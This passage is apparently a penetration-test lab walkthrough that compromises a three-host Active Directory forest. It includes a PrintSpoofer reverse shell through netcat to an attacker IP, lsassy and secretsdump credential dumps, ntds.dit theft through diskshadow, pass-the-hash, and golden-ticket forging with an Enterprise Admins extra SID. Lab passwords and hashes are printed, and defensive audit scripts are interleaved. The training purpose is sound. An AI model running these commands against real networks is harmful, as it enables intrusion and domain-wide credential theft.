Information
About this lab
The Poseidon lab showcases Active Directory attacks leveraging ASREPRoasting and SeImpersonate privilege escalation. Learners will extract an AS_REP hash, crack it for credentials, and gain initial access to the target. Privilege escalation through abuse of SeImpersonate permissions demonstrates how attackers can exploit system-level access. Post-exploitation involves dumping credentials from memory, preparing for lateral movement.
Proof of Concept
Information Gathering
Nmap
# Nmap 7.95 scan initiated Tue Dec 30 00:52:20 2025 as: /usr/lib/nmap/nmap -Pn -n --open --min-rate 3000 -oN scan 192.168.170.161-163
Nmap scan report for 192.168.170.161
Host is up (0.13s latency).
Not shown: 988 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
Nmap scan report for 192.168.170.162
Host is up (0.13s latency).
Not shown: 987 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
Nmap scan report for 192.168.170.163
Host is up (0.12s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
Host Discovery
┌──(kali🎃kali)-[~/oscp]
└─$ nxc smb 192.168.170.161-163
SMB 192.168.170.163 445 GYOZA [*] Windows 10 / Server 2019 Build 19041 x64 (name:GYOZA) (domain:sub.poseidon.yzx) (signing:False) (SMBv1:False)
SMB 192.168.170.162 445 DC02 [*] Windows 10 / Server 2016 Build 14393 x64 (name:DC02) (domain:sub.poseidon.yzx) (signing:True) (SMBv1:True)
SMB 192.168.170.161 445 DC01 [*] Windows 10 / Server 2016 Build 14393 x64 (name:DC01) (domain:poseidon.yzx) (signing:True) (SMBv1:True)
Hosts file setting
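The banner lines above already tell a defender something before any credential is used: GYOZA reports signing:False, and both domain controllers still speak SMBv1. The following script is an added example (not part of the original writeup and not an nxc feature) that parses nxc smb banner lines and turns them into hardening findings; the three sample lines are copied from the output above.

```python
import re

# Constructed sample input: the three banner lines nxc printed above, copied verbatim.
SAMPLE_BANNERS = """\
SMB 192.168.170.163 445 GYOZA [*] Windows 10 / Server 2019 Build 19041 x64 (name:GYOZA) (domain:sub.poseidon.yzx) (signing:False) (SMBv1:False)
SMB 192.168.170.162 445 DC02 [*] Windows 10 / Server 2016 Build 14393 x64 (name:DC02) (domain:sub.poseidon.yzx) (signing:True) (SMBv1:True)
SMB 192.168.170.161 445 DC01 [*] Windows 10 / Server 2016 Build 14393 x64 (name:DC01) (domain:poseidon.yzx) (signing:True) (SMBv1:True)
"""

# One nxc banner line: protocol, ip, port, hostname, then the "(key:value)" fields.
BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+\d+\s+(?P<host>\S+)\s+\[\*\].*?"
    r"\(domain:(?P<domain>[^)]+)\).*?"
    r"\(signing:(?P<signing>True|False)\).*?"
    r"\(SMBv1:(?P<smbv1>True|False)\)"
)


def parse_banners(text):
    """Turn nxc 'smb' banner lines into dicts; lines that do not match are skipped."""
    hosts = []
    for line in text.splitlines():
        m = BANNER_RE.match(line.strip())
        if m is None:
            continue
        hosts.append({
            "ip": m["ip"],
            "host": m["host"],
            "domain": m["domain"],
            "signing_required": m["signing"] == "True",
            "smbv1": m["smbv1"] == "True",
        })
    return hosts


def audit_smb(hosts):
    """Map hostname -> list of SMB hardening gaps worth a ticket."""
    findings = {}
    for h in hosts:
        issues = []
        if not h["signing_required"]:
            # Without mandatory signing a relayed NTLM authentication is accepted
            # as-is; the fix is the policy
            # "Microsoft network server: Digitally sign communications (always)".
            issues.append("SMB signing not required")
        if h["smbv1"]:
            # SMBv1 has no pre-authentication integrity; disable the feature.
            issues.append("SMBv1 enabled")
        if issues:
            findings[h["host"]] = issues
    return findings


if __name__ == "__main__":
    for host, issues in audit_smb(parse_banners(SAMPLE_BANNERS)).items():
        print(f"{host}: {', '.join(issues)}")
```

Domain controllers require signing by default, which is why only the member server GYOZA is flagged for it; SMBv1 on the two DCs is a separate, legacy setting.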
┌──(kali🎃kali)-[~/oscp]
└─$ sudo cat /etc/hosts
<SNIP>
192.168.170.161 DC01.poseidon.yzx DC01 poseidon.yzx
192.168.170.162 DC02.sub.poseidon.yzx DC02 sub.poseidon.yzx
192.168.170.163 GYOZA.sub.poseidon.yzx GYOZA sub.poseidon.yzx
192.168.170.163 - GYOZA
Eric.Wallows / EricLikesRunning800
Initial Access
WinRM login
┌──(kali🎃kali)-[~/oscp]
└─$ evil-winrm -i 192.168.170.163 -u 'Eric.Wallows' -p 'EricLikesRunning800'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\eric.wallows\Documents>
Privilege Escalation
Check privileges
- SeImpersonatePrivilege is held
*Evil-WinRM* PS C:\Users> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
Attempt a reverse shell with administrator privileges using PrintSpoofer64
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> .\PrintSpoofer64.exe -c "nc64.exe 192.168.45.168 4444 -e powershell"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Reverse shell with administrator privileges connected successfully
┌──(kali🎃kali)-[~/oscp]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.168] from (UNKNOWN) [192.168.170.163] 51976
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Windows\system32> whoami
whoami
nt authority\system
Read local.txt
PS C:\Users\chen\Desktop> type local.txt
type local.txt
e241e121fe987ba52330362c74c7dde0
PS C:\Users\chen\Desktop> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.170.163
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.170.254
Read proof.txt
PS C:\Users\Administrator\Desktop> type proof.txt
type proof.txt
a80226fb09d4f2859247b69003270ef8
PS C:\Users\Administrator\Desktop> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.170.163
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.170.254
Post-Exploitation
nxc lsassy module
- lisa / LisaWayToGo456
┌──(kali🎃kali)-[~/oscp]
└─$ nxc smb 192.168.170.163 -u 'eric.wallows' -p 'EricLikesRunning800' -M lsassy
SMB 192.168.170.163 445 GYOZA [*] Windows 10 / Server 2019 Build 19041 x64 (name:GYOZA) (domain:sub.poseidon.yzx) (signing:False) (SMBv1:False)
SMB 192.168.170.163 445 GYOZA [+] sub.poseidon.yzx\eric.wallows:EricLikesRunning800 (Pwn3d!)
LSASSY 192.168.170.163 445 GYOZA sub\lisa 905ae9b4d957545fb7b9ea0c4333247b
LSASSY 192.168.170.163 445 GYOZA sub\lisa LisaWayToGo456
LSASSY 192.168.170.163 445 GYOZA SUB.POSEIDON.YZX\lisa LisaWayToGo456
impacket-secretsdump
- lisa / Impossible2Crack4.?
┌──(kali🎃kali)-[~/oscp]
└─$ impacket-secretsdump eric.wallows:EricLikesRunning800@192.168.170.163 -dc-ip 192.168.170.161
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x670e70016a4a08027d1a7657df06cfb6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
<SNIP>
[*] DefaultPassword
sub.poseidon.yzx\lisa:Impossible2Crack4.?
<SNIP>
SharpHound collection
- The lisa account holds AllExtendedRights over the jackie account
- A forced password change is therefore possible
PS C:\Users\eric.wallows\Documents> .\sharpHound.exe -c All
.\sharpHound.exe -c All
2025-12-30T06:23:43.8819131+00:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-12-30T06:23:44.0069271+00:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2025-12-30T06:23:44.0225436+00:00|INFORMATION|Initializing SharpHound at 6:23 AM on 12/30/2025
2025-12-30T06:23:44.0381648+00:00|INFORMATION|Resolved current domain to sub.poseidon.yzx
2025-12-30T06:23:44.1787945+00:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2025-12-30T06:23:44.2412888+00:00|INFORMATION|Beginning LDAP search for sub.poseidon.yzx
2025-12-30T06:23:44.2412888+00:00|INFORMATION|Collecting AdminSDHolder data for sub.poseidon.yzx
2025-12-30T06:23:44.2881655+00:00|INFORMATION|AdminSDHolder ACL hash B169ECAC85D330AEDDF874BF7EEBE759C62A255C calculated for sub.poseidon.yzx.
2025-12-30T06:23:44.3819136+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SUB.POSEIDON.YZX
2025-12-30T06:23:44.3819136+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SUB.POSEIDON.YZX
2025-12-30T06:23:44.4131690+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SUB.POSEIDON.YZX
192.168.170.162 - DC02
Lateral Movement (GYOZA to DC02)
Use the lisa account to change the jackie account's password to "1q2w3e4r"
┌──(kali🎃kali)-[~/oscp]
└─$ net rpc password "jackie" -U "sub.poseidon.yzx/lisa"%"LisaWayToGo456" -S "192.168.170.162"
Enter new password for jackie:
WinRM login successful
┌──(kali🎃kali)-[~/oscp]
└─$ evil-winrm -i 192.168.170.162 -u 'jackie' -p '1q2w3e4r'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jackie\Documents>
Read local.txt
*Evil-WinRM* PS C:\Users\jackie\Desktop> type local.txt
0d8548e82b5a329607ceb10cfded0945
*Evil-WinRM* PS C:\Users\jackie\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.170.162
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.170.254
Tunnel adapter isatap.{8FABB686-864E-49E3-B767-1756BE5D5A72}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Privilege Escalation
- SeRestorePrivilege is present
*Evil-WinRM* PS C:\Users\jackie\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Create a file and set instructions to copy C:\ drive into E: drive with an alias.
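Before moving on to the diskshadow step: the two whoami /priv listings above (eric.wallows on GYOZA, jackie on DC02) are exactly what a privilege review should catch, since SeImpersonatePrivilege on a member server and SeBackupPrivilege/SeRestorePrivilege on a domain controller are each sufficient for what follows. The script below is an added example (not from the original writeup) that parses whoami /priv output and reports the privileges a low-privileged account should not hold; the high-risk list and its reasons are my own, and the two samples are copied from the listings above.

```python
import re

# Constructed samples: the two whoami /priv listings shown above, copied as printed
# (eric.wallows on GYOZA, jackie on DC02).
GYOZA_PRIVS = """\
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
"""

DC02_PRIVS = """\
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

# Privileges that by themselves give a foothold account a path to SYSTEM or to
# protected data; an ordinary user should hold none of these (my list, not exhaustive).
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate tokens of connecting clients, SYSTEM included",
    "SeAssignPrimaryTokenPrivilege": "start a process under another account's token",
    "SeBackupPrivilege": "read any file regardless of ACL (registry hives, ntds.dit)",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeDebugPrivilege": "open any process, including lsass.exe",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load a kernel driver",
}

# "<name> <description> <Enabled|Disabled>" rows; header and rule lines do not match.
PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+.*\s(Enabled|Disabled)\s*$")


def parse_privs(text):
    """Return {privilege name: True if Enabled} from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_RE.match(line.rstrip())
        if m:
            privs[m.group(1)] = m.group(2) == "Enabled"
    return privs


def risky_privs(text):
    """High-risk privileges present in the token, with the reason they matter.
    A 'Disabled' state still counts: the privilege is in the token and the
    holder can re-enable it with AdjustTokenPrivileges."""
    return {p: HIGH_RISK[p] for p in parse_privs(text) if p in HIGH_RISK}


if __name__ == "__main__":
    for label, sample in (("GYOZA/eric.wallows", GYOZA_PRIVS), ("DC02/jackie", DC02_PRIVS)):
        for priv, reason in risky_privs(sample).items():
            print(f"{label}: {priv}: {reason}")
```

SeImpersonatePrivilege is normal for service accounts such as IIS application pools, which is why it is routinely found on member servers; on a DC, SeBackupPrivilege and SeRestorePrivilege usually come from membership in Backup Operators or Server Operators, so the fix is a group-membership review rather than a policy change.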
*Evil-WinRM* PS C:\Users\jackie\Desktop> type ine.txt
set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias ineX
createX
expose %ine% E:X
end backupX
Run diskshadow with the script file using the /s option
*Evil-WinRM* PS C:\Users\jackie\Desktop> diskshadow /s ine.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC02, 12/30/2025 8:46:55 AM
-> set verbose on
-> set metadata C:\Windows\Temp\meta.cab
The existing file will be overwritten.
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias ine
-> create
COM call "lvssObject4->GetRootAndLogicalPrefixPaths" failed.
Excluding writer "Shadow Copy Optimization Writer", because all of its components have been excluded.
Component "\BCD\BCD" from writer "ASR Writer" is excluded from backup
because it requires a volume that cannot be found on this system.
* Including writer "Task Scheduler Writer":
+ Adding component: \TasksStore
* Including writer "VSS Metadata Store Writer":
+ Adding component: \WriterMetadataStore
* Including writer "Performance Counters Writer":
+ Adding component: \PerformanceCounters
* Including writer "System Writer":
+ Adding component: \System Files
+ Adding component: \Win32 Services Files
* Including writer "ASR Writer":
+ Adding component: \ASR\ASR
+ Adding component: \Volumes\Volume{bc265d6e-c516-4c80-b881-4e8c9eae5940}
+ Adding component: \Volumes\Volume{f8e00104-0004-4492-ba85-66d76199f92e}
+ Adding component: \Disks\harddisk0
Copy ntds.dit into the current working directory using robocopy.
*Evil-WinRM* PS C:\Users\jackie\Desktop> robocopy /b e:\windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Tuesday, December 30, 2025 8:47:59 AM
Source : e:\windows\ntds\
Dest : C:\Users\jackie\Desktop\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 e:\windows\ntds\
New File 24.0 m ntds.dit
0.0%
0.2%
0.5%
0.7%
1.0%
1.3%
1.5%
1.8%
<SNIP>
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 24.00 m 24.00 m 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Speed : 181049093 Bytes/sec.
Speed : 10359.712 MegaBytes/min.
Ended : Tuesday, December 30, 2025 8:47:59 AM
Save the SYSTEM registry hive to extract the hashes
*Evil-WinRM* PS C:\Users\jackie\Desktop> reg save hklm\system system
The operation completed successfully
Downloaded the system and ntds.dit files
*Evil-WinRM* PS C:\Users\jackie\Desktop> download ntds.dit
Info: Downloading C:\Users\jackie\Desktop\ntds.dit to ntds.dit
Info: Download successful!
*Evil-WinRM* PS C:\Users\jackie\Desktop> download system
Info: Downloading C:\Users\jackie\Desktop\ntds.dit to system
Info: Download successful!
impacket-secretsdump
- Administrator NTLM hash
- 3bcdd818f7ec942ac91aa30d8db71927
┌──(kali🎃kali)-[~/oscp]
└─$ impacket-secretsdump -system system -ntds ntds.dit local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x6147911c9221199f60a625e5011aafde
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 510cae62a7d31edc77934766cf32f0ac
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3bcdd818f7ec942ac91aa30d8db71927:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:92d9c96980ab389994f4ffda906fe102:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:80f23a248d39b8cb93df3a4a2f4199a1:::
POSEIDON$:1103:aad3b435b51404eeaad3b435b51404ee:01196f308a81e26264eb41dbb4b3e668:::
sub.poseidon.yzx\chen:1104:aad3b435b51404eeaad3b435b51404ee:c4ddb64252adfc9e0558353099ded495:::
WinRM login successful with the administrator NTLM hash
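A dump like the one above is also what an authorised password audit works from, and the same fields answer the defender's questions: which accounts have an empty password, whether any LM hashes are still stored, and which accounts share a password. The script below is an added example (not part of the original writeup and not an Impacket feature) that parses secretsdump's user:rid:lmhash:nthash::: lines; the sample is the ntds.dit output above plus one made-up service account, labelled as constructed, that reuses the Administrator hash so the reuse check has something to find.

```python
import re
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
NO_LM = "aad3b435b51404eeaad3b435b51404ee"     # LM field when no LM hash is stored

# Constructed sample: the ntds.dit lines secretsdump printed above, plus one
# made-up service account (svc_example, not from the lab) that reuses the
# Administrator hash.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3bcdd818f7ec942ac91aa30d8db71927:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:92d9c96980ab389994f4ffda906fe102:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:80f23a248d39b8cb93df3a4a2f4199a1:::
POSEIDON$:1103:aad3b435b51404eeaad3b435b51404ee:01196f308a81e26264eb41dbb4b3e668:::
sub.poseidon.yzx\\chen:1104:aad3b435b51404eeaad3b435b51404ee:c4ddb64252adfc9e0558353099ded495:::
sub.poseidon.yzx\\svc_example:1200:aad3b435b51404eeaad3b435b51404ee:3bcdd818f7ec942ac91aa30d8db71927:::
"""

# user:rid:lmhash:nthash::: exactly as secretsdump prints it
DUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)


def parse_dump(text):
    """Parse hash lines; progress lines such as '[*] PEK # 0 found' are skipped."""
    rows = []
    for line in text.splitlines():
        m = DUMP_RE.match(line.strip())
        if m is None:
            continue
        row = m.groupdict()
        row["rid"] = int(row["rid"])
        row["machine"] = row["user"].endswith("$")
        rows.append(row)
    return rows


def audit_dump(rows):
    """Findings a password audit raises on a hash dump."""
    findings = {"empty_password": [], "lm_hash_stored": [], "shared_hash": {}}
    by_nt = defaultdict(list)
    for r in rows:
        if r["nt"] == EMPTY_NT:
            findings["empty_password"].append(r["user"])
        if r["lm"] != NO_LM:
            findings["lm_hash_stored"].append(r["user"])
        # Machine accounts have random passwords, and empty ones are listed already,
        # so neither takes part in the reuse check.
        if not r["machine"] and r["nt"] != EMPTY_NT:
            by_nt[r["nt"]].append(r["user"])
    findings["shared_hash"] = {nt: users for nt, users in by_nt.items() if len(users) > 1}
    return findings


if __name__ == "__main__":
    for key, value in audit_dump(parse_dump(SAMPLE_DUMP)).items():
        print(f"{key}: {value}")
```

Guest and DefaultAccount carry the empty-password hash because they are disabled built-in accounts; the dump format alone does not show enabled/disabled state, so run secretsdump with -user-status when the audit needs it.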
┌──(kali🎃kali)-[~/oscp]
└─$ evil-winrm -i 192.168.170.162 -u 'administrator' -H '3bcdd818f7ec942ac91aa30d8db71927'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Read proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt
d31712374af31e61049be74b57066767
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.170.162
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.170.254
Tunnel adapter isatap.{8FABB686-864E-49E3-B767-1756BE5D5A72}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
192.168.170.161 - DC01
Lateral Movement (DC02 to DC01)
Configure the eric.wallows account so that it can access DC02 with administrator privileges
Domain SID extraction
- DC01: S-1-5-21-1190331060-1711709193-932631991
- DC02: S-1-5-21-4168247447-1722543658-2110108262
C:\Windows\system32> nltest /domain_trusts /v
List of domain trusts:
0: POSEIDON poseidon.yzx (NT 5) (Forest Tree Root) (Direct Outbound) (Direct Inbound) ( Attr: withinforest )
Dom Guid: b77f9b23-9f53-4afc-a027-b38929b466f0
Dom Sid: S-1-5-21-1190331060-1711709193-932631991
1: sub sub.poseidon.yzx (NT 5) (Forest: 0) (Primary Domain) (Native)
Dom Guid: 5cdf1d22-5e08-4243-b8b1-32651fe49630
Dom Sid: S-1-5-21-4168247447-1722543658-2110108262
The command completed successfully
krbtgt NTLM hash extraction
- krbtgt:502:aad3b435b51404eeaad3b435b51404ee:80f23a248d39b8cb93df3a4a2f4199a1:::
- krbtgt:aes256-cts-hmac-sha1-96:b2304e451b53dc5e71c08ddd0fd06a3803d8f14243020fd46c80ad44ec75d2a2
┌──(kali🎃kali)-[~/oscp]
└─$ impacket-secretsdump eric.wallows:EricLikesRunning800@192.168.170.162
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x6147911c9221199f60a625e5011aafde
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8fea81a19d172de0c445c8072b9a1697:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<SNIP>
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3bcdd818f7ec942ac91aa30d8db71927:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:80f23a248d39b8cb93df3a4a2f4199a1:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<SNIP>
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e2786e98a3205f9085ef7071d992422f735ce704f4ba5c29f65f25beed348228
Administrator:aes128-cts-hmac-sha1-96:b6593732b7ab7cecd59afadef15b4315
Administrator:des-cbc-md5:e0e03d58a15d315e
krbtgt:aes256-cts-hmac-sha1-96:b2304e451b53dc5e71c08ddd0fd06a3803d8f14243020fd46c80ad44ec75d2a2
krbtgt:aes128-cts-hmac-sha1-96:b5d83edef61d3c3799047e208e13b2c7
krbtgt:des-cbc-md5:b95ee5a11c10d989
ticketer.py -nthash KRBTGTHASH -domain CHILDFQDN -domain-sid CHILDDOMAINSID -extra-sid PARENTDOMAINSID- hacker
┌──(kali🎃kali)-[~/oscp]
└─$ impacket-ticketer -nthash 80f23a248d39b8cb93df3a4a2f4199a1 -domain sub.poseidon.yzx -domain-sid S-1-5-21-4168247447-1722543658-2110108262 -extra-sid S-1-5-21-1190331060-1711709193-932631991 Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sub.poseidon.yzx/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccache
Create a golden ticket based on the information gathered
┌──(kali🎃kali)-[~/oscp]
└─$ impacket-ticketer -aesKey b2304e451b53dc5e71c08ddd0fd06a3803d8f14243020fd46c80ad44ec75d2a2 -domain sub.poseidon.yzx -domain-sid S-1-5-21-4168247447-1722543658-2110108262 -extra-sid S-1-5-21-1190331060-1711709193-932631991-519 Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sub.poseidon.yzx/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccache
Load the ticket
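Before the ticket is loaded, it is worth being precise about what the two ticketer invocations above differ in and why the parent domain accepts the result. The first passes the bare parent domain SID as the extra SID, which has no RID and so names no principal; the second appends RID 519, the Enterprise Admins group of poseidon.yzx. A parent-child trust inside a forest applies no SID filtering by default, so DC01 honours a SID from its own domain that arrives in a PAC issued by the child, which is the reason the forest, not the domain, is the security boundary. The script below is an added example (not from the original writeup and not an Impacket feature) showing the check a defender would apply to a ticket's ExtraSids and what SID filtering on a quarantined trust would strip; the two SIDs are the ones from the commands above and the privileged-RID table is mine.

```python
import re

# Values taken from the two ticketer invocations above.
CHILD_SID = "S-1-5-21-4168247447-1722543658-2110108262"   # sub.poseidon.yzx
PARENT_SID = "S-1-5-21-1190331060-1711709193-932631991"  # poseidon.yzx

# Well-known domain-relative RIDs whose presence from *another* domain is the
# signal to alert on (my table; RID 519 is the one used above).
PRIVILEGED_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

# A domain SID is S-1-5-21 plus three sub-authorities; a principal SID adds one RID.
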